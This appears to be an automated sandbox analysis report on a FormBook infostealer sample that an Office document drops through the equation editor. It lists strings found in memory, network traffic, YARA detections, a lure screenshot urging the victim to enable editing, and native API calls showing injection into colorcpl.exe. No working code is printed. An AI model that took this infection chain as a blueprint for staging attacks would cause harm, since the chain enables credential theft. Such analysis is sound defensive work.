Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://uk.joiebaby.com/liverpoolfc/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://uk.tigerwit.com/about/liverpool
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.acronis.com/en-gb/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.axa.com/?utm_source=liverpoolfc&utm_medium=logo-partnership&utm_campaign=lfc1819
Source: vbc.exe, 00000004.00000002.2376771128.000000000214D000.00000004.00000001.sdmp	String found in binary or memory: https://www.chelseafc.com
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.easports.com/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.expedia.co.uk/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-M54566
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://www.hcltech.com/unitedbyhcl
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.hollyfrontier.com/home/default.aspx
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.levi.com/GB/en_GB/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpoolfc.com
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpoolfc.com/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.liverpoolfc.com/match/2020-21/first-team/fixtures-and-results
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://www.mancity.com
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: https://www.mancity.com/base/yHKMynEQdmageymJtFtbdgSAEMgxzBItmdtrEXvZktIObREdEIRhKVrOjiMghq.html
Source: vbc.exe, 00000004.00000002.2376771128.000000000214D000.00000004.00000001.sdmp	String found in binary or memory: https://www.manutd.com/
Source: vbc.exe, 00000004.00000002.2376771128.000000000214D000.00000004.00000001.sdmp	String found in binary or memory: https://www.manutd.com/en
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://www.manutd.com/en/Help/Accessibility
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://www.manutd.com/en/Help/Privacy-Policy
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://www.manutd.com/en/Partners/Global/Visit-Malta
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://www.manutd.com/en/help/club-contacts?int_source=manutd.com&int_medium=menu&int_campa
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://www.manutd.com/en/partners/global/marriott-hotels
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://www.manutd.com/en/partners/global/swissquote
Source: vbc.exe, 00000004.00000002.2376771128.000000000214D000.00000004.00000001.sdmp	String found in binary or memory: https://www.manutd.comP
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.mitel.com/learn/case-studies/liverpool-football-club
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.mondelezinternational.com/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.nike.com/gb/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.quorn.com/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.realmadrid.com
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: https://www.realmadrid.com/base/yHKMynEQdmageymJtFtbdgSAEMgxzBItmdtrEXvZktIObREdEIRhKVrOjiMghq.html
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.snapchat.com/
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.tourism-mauritius.mu
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.twitter.com/realmadrid
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/manutd
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com/realmadrid

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443

Source: unknown

HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49167 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2376039080.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2375852028.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2376092143.00000000001B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Editing from the . , yellow bar above This document is 3. Once you have enabled editing, p

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\IMG-354635[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E1574 NtSetInformationThread,	4_2_001E1574
Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E2E58 NtSetInformationThread,	4_2_001E2E58
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00419D50 NtCreateFile,	10_2_00419D50
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00419E00 NtReadFile,	10_2_00419E00
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00419E80 NtClose,	10_2_00419E80
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00419F30 NtAllocateVirtualMemory,	10_2_00419F30
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00419D4D NtCreateFile,	10_2_00419D4D
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00419DFA NtReadFile,	10_2_00419DFA
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00419E7A NtClose,	10_2_00419E7A
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A900C4 NtCreateFile,LdrInitializeThunk,	10_2_00A900C4
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A90078 NtResumeThread,LdrInitializeThunk,	10_2_00A90078
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A90048 NtProtectVirtualMemory,LdrInitializeThunk,	10_2_00A90048
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8F9F0 NtClose,LdrInitializeThunk,	10_2_00A8F9F0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8F900 NtReadFile,LdrInitializeThunk,	10_2_00A8F900
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FAE8 NtQueryInformationProcess,LdrInitializeThunk,	10_2_00A8FAE8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_00A8FAD0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FBB8 NtQueryInformationToken,LdrInitializeThunk,	10_2_00A8FBB8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FB68 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_00A8FB68
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FC90 NtUnmapViewOfSection,LdrInitializeThunk,	10_2_00A8FC90
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FC60 NtMapViewOfSection,LdrInitializeThunk,	10_2_00A8FC60
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FD8C NtDelayExecution,LdrInitializeThunk,	10_2_00A8FD8C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FDC0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_00A8FDC0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FEA0 NtReadVirtualMemory,LdrInitializeThunk,	10_2_00A8FEA0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_00A8FED0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FFB4 NtCreateSection,LdrInitializeThunk,	10_2_00A8FFB4
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A910D0 NtOpenProcessToken,	10_2_00A910D0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A90060 NtQuerySection,	10_2_00A90060
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A901D4 NtSetValueKey,	10_2_00A901D4
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A9010C NtOpenDirectoryObject,	10_2_00A9010C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A91148 NtOpenThread,	10_2_00A91148
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A907AC NtCreateMutant,	10_2_00A907AC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8F8CC NtWaitForSingleObject,	10_2_00A8F8CC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8F938 NtWriteFile,	10_2_00A8F938
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A91930 NtSetContextThread,	10_2_00A91930
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FAB8 NtQueryValueKey,	10_2_00A8FAB8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FA20 NtQueryInformationFile,	10_2_00A8FA20
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FA50 NtEnumerateValueKey,	10_2_00A8FA50
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FBE8 NtQueryVirtualMemory,	10_2_00A8FBE8
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FB50 NtCreateKey,	10_2_00A8FB50
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FC30 NtOpenProcess,	10_2_00A8FC30
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FC48 NtSetInformationFile,	10_2_00A8FC48
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A90C40 NtGetContextThread,	10_2_00A90C40
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A91D80 NtSuspendThread,	10_2_00A91D80
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FD5C NtEnumerateKey,	10_2_00A8FD5C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FE24 NtWriteVirtualMemory,	10_2_00A8FE24
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FFFC NtCreateProcessEx,	10_2_00A8FFFC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A8FF34 NtQueueApcThread,	10_2_00A8FF34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027000C4 NtCreateFile,LdrInitializeThunk,	14_2_027000C4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027007AC NtCreateMutant,LdrInitializeThunk,	14_2_027007AC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFAE8 NtQueryInformationProcess,LdrInitializeThunk,	14_2_026FFAE8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	14_2_026FFAD0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFAB8 NtQueryValueKey,LdrInitializeThunk,	14_2_026FFAB8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFB68 NtFreeVirtualMemory,LdrInitializeThunk,	14_2_026FFB68
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFB50 NtCreateKey,LdrInitializeThunk,	14_2_026FFB50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFBB8 NtQueryInformationToken,LdrInitializeThunk,	14_2_026FFBB8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FF900 NtReadFile,LdrInitializeThunk,	14_2_026FF900
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FF9F0 NtClose,LdrInitializeThunk,	14_2_026FF9F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	14_2_026FFED0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFFB4 NtCreateSection,LdrInitializeThunk,	14_2_026FFFB4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFC60 NtMapViewOfSection,LdrInitializeThunk,	14_2_026FFC60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFDC0 NtQuerySystemInformation,LdrInitializeThunk,	14_2_026FFDC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFD8C NtDelayExecution,LdrInitializeThunk,	14_2_026FFD8C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02700078 NtResumeThread,	14_2_02700078
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02700060 NtQuerySection,	14_2_02700060
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02700048 NtProtectVirtualMemory,	14_2_02700048
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027010D0 NtOpenProcessToken,	14_2_027010D0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02701148 NtOpenThread,	14_2_02701148
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0270010C NtOpenDirectoryObject,	14_2_0270010C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027001D4 NtSetValueKey,	14_2_027001D4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFA50 NtEnumerateValueKey,	14_2_026FFA50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFA20 NtQueryInformationFile,	14_2_026FFA20
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFBE8 NtQueryVirtualMemory,	14_2_026FFBE8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FF8CC NtWaitForSingleObject,	14_2_026FF8CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02701930 NtSetContextThread,	14_2_02701930
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FF938 NtWriteFile,	14_2_026FF938
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFE24 NtWriteVirtualMemory,	14_2_026FFE24
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFEA0 NtReadVirtualMemory,	14_2_026FFEA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFF34 NtQueueApcThread,	14_2_026FFF34
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFFFC NtCreateProcessEx,	14_2_026FFFFC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFC48 NtSetInformationFile,	14_2_026FFC48
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02700C40 NtGetContextThread,	14_2_02700C40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFC30 NtOpenProcess,	14_2_026FFC30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFC90 NtUnmapViewOfSection,	14_2_026FFC90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_026FFD5C NtEnumerateKey,	14_2_026FFD5C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02701D80 NtSuspendThread,	14_2_02701D80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00099D50 NtCreateFile,	14_2_00099D50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00099E00 NtReadFile,	14_2_00099E00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00099E80 NtClose,	14_2_00099E80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00099F30 NtAllocateVirtualMemory,	14_2_00099F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00099D4D NtCreateFile,	14_2_00099D4D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00099DFA NtReadFile,	14_2_00099DFA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_00099E7A NtClose,	14_2_00099E7A

Source: C:\Users\Public\vbc.exe	Code function: 4_2_001E61BF	4_2_001E61BF
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00401030	10_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041D08D	10_2_0041D08D
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041E8B2	10_2_0041E8B2
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00402D90	10_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 10_2_0041E597	10_2_0041E597
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00409E2B	10_2_00409E2B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00409E30	10_2_00409E30
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00402FB0	10_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A9E0C6	10_2_00A9E0C6
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00ACD005	10_2_00ACD005
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AA3040	10_2_00AA3040
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AB905A	10_2_00AB905A
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A9E2E9	10_2_00A9E2E9
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00B41238	10_2_00B41238
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A9F3CF	10_2_00A9F3CF
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AC63DB	10_2_00AC63DB
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AA2305	10_2_00AA2305
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AEA37B	10_2_00AEA37B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AA7353	10_2_00AA7353
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AB1489	10_2_00AB1489
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AD5485	10_2_00AD5485
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00ADD47D	10_2_00ADD47D
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00ABC5F0	10_2_00ABC5F0
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AA351F	10_2_00AA351F
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AE6540	10_2_00AE6540
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AA4680	10_2_00AA4680
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AAE6C1	10_2_00AAE6C1
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00B42622	10_2_00B42622
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AAC7BC	10_2_00AAC7BC
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00B2579A	10_2_00B2579A
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AD57C3	10_2_00AD57C3
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00B3F8EE	10_2_00B3F8EE
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AC286D	10_2_00AC286D
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AAC85C	10_2_00AAC85C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AA29B2	10_2_00AA29B2
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00B4098E	10_2_00B4098E
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AB69FE	10_2_00AB69FE
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00B25955	10_2_00B25955
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00B53A83	10_2_00B53A83
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00B4CBA4	10_2_00B4CBA4
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00B2DBDA	10_2_00B2DBDA
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00A9FBD7	10_2_00A9FBD7
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AC7B00	10_2_00AC7B00
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00B3FDDD	10_2_00B3FDDD
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AD0D3B	10_2_00AD0D3B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AACD5B	10_2_00AACD5B
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AD2E2F	10_2_00AD2E2F
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00ABEE4C	10_2_00ABEE4C
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00AB0F3F	10_2_00AB0F3F
Source: C:\Users\Public\vbc.exe	Code function: 10_2_00ACDF7C	10_2_00ACDF7C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027B1238	14_2_027B1238
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0270E2E9	14_2_0270E2E9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0275A37B	14_2_0275A37B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02717353	14_2_02717353
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02712305	14_2_02712305
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027363DB	14_2_027363DB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0270F3CF	14_2_0270F3CF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027B63BF	14_2_027B63BF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0272905A	14_2_0272905A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_02713040	14_2_02713040
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0273D005	14_2_0273D005
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0270E0C6	14_2_0270E0C6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_0275A634	14_2_0275A634
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_027B2622	14_2_027B2622
